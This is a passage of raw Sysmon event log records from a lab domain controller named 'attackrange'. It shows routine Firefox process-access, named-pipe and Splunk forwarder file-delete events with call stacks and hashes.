Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105143Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.308{58E9C193-B422-615A-0602-00000000FC01}55524812C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a0b461|C:\Program Files\Mozilla Firefox\xul.dll+a6c6e5|C:\Program Files\Mozilla Firefox\xul.dll+d0281|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+1747b79|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+26742|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105142Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.308{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105141Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.308{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4efc8|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a5b7d9|C:\Program Files\Mozilla Firefox\xul.dll+e50238|C:\Program Files\Mozilla Firefox\xul.dll+19e1f56|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+19ae344|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000105140Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.308{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-1C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000105139Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.308{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-1C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105138Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.308{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4efc8|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a5b7d9|C:\Program Files\Mozilla Firefox\xul.dll+e50238|C:\Program Files\Mozilla Firefox\xul.dll+19e1f56|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+19ae344|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000105137Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.308{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-0C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000105136Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.292{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-0C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105135Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.292{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105134Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.292{58E9C193-B425-615A-0702-00000000FC01}5268\chrome.5552.6.35721706C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105133Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.292{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+1b80fc|C:\Program Files\Mozilla Firefox\xul.dll+a15446|C:\Program Files\Mozilla Firefox\xul.dll+a0ffef|C:\Program Files\Mozilla Firefox\xul.dll+19ce81f|C:\Program Files\Mozilla Firefox\xul.dll+19ccfc1|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000105132Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.292{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.6.35721706C:\Program Files\Mozilla Firefox\firefox.exe 18141800x8000000000000000105131Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.292{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.5.35910135C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105130Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.292{58E9C193-B422-615A-0602-00000000FC01}55524224C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+13527b|C:\Program Files\Mozilla Firefox\xul.dll+12239ed|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105129Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.292{58E9C193-B422-615A-0602-00000000FC01}5552\gecko-crash-server-pipe.5552C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105128Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.292{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFB6D3BB6FFA77252924FC2C01A3A498,SHA256=8345C04427EEB44A10C562F6F5A42261CF46E8A98AE86AAD79596AFD60DBAAED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105127Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.292{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B6B01443BFC4F596E3BF084102B1289,SHA256=DC4FCB9FE29D1520661BCA2ADAD9EFA07965766BAFFE26CBAEA69657716B37DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105126Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.277{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105125Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105124Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105123Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e49022|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4|C:\Program Files\Mozilla Firefox\xul.dll+1b6175d|C:\Program Files\Mozilla Firefox\xul.dll+16fe0ad 10341000x8000000000000000105122Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105121Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105120Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105119Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105118Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105117Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105116Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105115Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla 